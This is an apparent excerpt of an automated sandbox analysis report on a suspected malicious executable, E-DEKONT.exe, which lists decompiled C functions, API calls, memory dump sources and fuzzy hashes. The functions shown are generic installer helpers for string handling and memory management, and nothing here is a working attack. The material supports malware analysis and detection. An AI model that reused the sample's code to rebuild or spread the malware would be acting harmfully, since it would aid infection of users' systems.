                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3355392842
                                                                            • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                            • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                                            • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                            • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00405B9F(WCHAR* _a4) {
                                                                            				WCHAR* _t5;
                                                                            				WCHAR* _t7;
                                                                            
                                                                            				_t7 = _a4;
                                                                            				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                            				while( *_t5 != 0x5c) {
                                                                            					_push(_t5);
                                                                            					_push(_t7);
                                                                            					_t5 = CharPrevW();
                                                                            					if(_t5 > _t7) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				 *_t5 =  *_t5 & 0x00000000;
                                                                            				return  &(_t5[1]);
                                                                            			}






                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\E-DEKONT.exe,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\E-DEKONT.exe,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3370423016
                                                                            • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                                            • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                            				void* _v0;
                                                                            				void* _t17;
                                                                            				signed int _t19;
                                                                            				void* _t20;
                                                                            				void* _t24;
                                                                            				void* _t26;
                                                                            				void* _t30;
                                                                            				void* _t36;
                                                                            				void* _t38;
                                                                            				void* _t39;
                                                                            				signed int _t41;
                                                                            				void* _t42;
                                                                            				void* _t51;
                                                                            				void* _t52;
                                                                            				signed short* _t54;
                                                                            				void* _t56;
                                                                            				void* _t59;
                                                                            				void* _t61;
                                                                            
                                                                            				 *0x1000406c = _a8;
                                                                            				 *0x10004070 = _a16;
                                                                            				 *0x10004074 = _a12;
                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                                                            				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                                                            				_t17 = E10001243();
                                                                            				_v0 = _t17;
                                                                            				_t52 = _t17;
                                                                            				if( *_t17 == 0) {
                                                                            					L16:
                                                                            					return GlobalFree(_t17);
                                                                            				} else {
                                                                            					do {
                                                                            						_t19 =  *_t52 & 0x0000ffff;
                                                                            						_t42 = 2;
                                                                            						_t54 = _t52 + _t42;
                                                                            						_t61 = _t19 - 0x6c;
                                                                            						if(_t61 > 0) {
                                                                            							_t20 = _t19 - 0x70;
                                                                            							if(_t20 == 0) {
                                                                            								L12:
                                                                            								_t52 = _t54 + _t42;
                                                                            								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                                            								L13:
                                                                            								GlobalFree(_t24);
                                                                            								goto L14;
                                                                            							}
                                                                            							_t26 = _t20 - _t42;
                                                                            							if(_t26 == 0) {
                                                                            								L10:
                                                                            								_t52 =  &(_t54[1]);
                                                                            								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                                            								goto L13;
                                                                            							}
                                                                            							L7:
                                                                            							if(_t26 == 1) {
                                                                            								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                                            								 *_t30 =  *0x10004040;
                                                                            								 *0x10004040 = _t30;
                                                                            								E10001563(_t30 + 4,  *0x10004074, _t41);
                                                                            								_t59 = _t59 + 0xc;
                                                                            							}
                                                                            							goto L14;
                                                                            						}
                                                                            						if(_t61 == 0) {
                                                                            							L17:
                                                                            							_t33 =  *0x10004040;
                                                                            							if( *0x10004040 != 0) {
                                                                            								E10001563( *0x10004074, _t33 + 4, _t41);
                                                                            								_t59 = _t59 + 0xc;
                                                                            								_t36 =  *0x10004040;
                                                                            								GlobalFree(_t36);
                                                                            								 *0x10004040 =  *_t36;
                                                                            							}
                                                                            							goto L14;
                                                                            						}
                                                                            						_t38 = _t19 - 0x4c;
                                                                            						if(_t38 == 0) {
                                                                            							goto L17;
                                                                            						}
                                                                            						_t39 = _t38 - 4;
                                                                            						if(_t39 == 0) {
                                                                            							 *_t54 =  *_t54 + 0xa;
                                                                            							goto L12;
                                                                            						}
                                                                            						_t26 = _t39 - _t42;
                                                                            						if(_t26 == 0) {
                                                                            							 *_t54 =  *_t54 + 0xa;
                                                                            							goto L10;
                                                                            						}
                                                                            						goto L7;
                                                                            						L14:
                                                                            					} while ( *_t52 != 0);
                                                                            					_t17 = _v0;
                                                                            					goto L16;
                                                                            				}
                                                                            			}






















                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405CD9(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                            				int _v8;
                                                                            				int _t12;
                                                                            				int _t14;
                                                                            				int _t15;
                                                                            				CHAR* _t17;
                                                                            				CHAR* _t27;
                                                                            
                                                                            				_t12 = lstrlenA(_a8);
                                                                            				_t27 = _a4;
                                                                            				_v8 = _t12;
                                                                            				while(lstrlenA(_t27) >= _v8) {
                                                                            					_t14 = _v8;
                                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                                            					if(_t15 == 0) {
                                                                            						_t17 = _t27;
                                                                            					} else {
                                                                            						_t27 = CharNextA(_t27);
                                                                            						continue;
                                                                            					}
                                                                            					L5:
                                                                            					return _t17;
                                                                            				}
                                                                            				_t17 = 0;
                                                                            				goto L5;
                                                                            			}










                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                                            • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:1.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:2
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 160 168510a TerminateThread 161 168511c 160->161

                                                                            Callgraph

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.108990617739.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1660000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: TerminateThread
                                                                            • String ID:
                                                                            • API String ID: 1852365436-0
                                                                            • Opcode ID: 6e9ecfd13b23db6035c263e93c4e91c8ec5796bfbbecec56630a767907b33f47
                                                                            • Instruction ID: f227de6951d659e59097eda81288b02e0cc89060e775c8884e6b39de126de7b4
                                                                            • Opcode Fuzzy Hash: 6e9ecfd13b23db6035c263e93c4e91c8ec5796bfbbecec56630a767907b33f47
                                                                            • Instruction Fuzzy Hash: 792104252057828BEF356F389CA07DA27A2AF533A0F5D826D9CC65B2C5C3398547C71B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%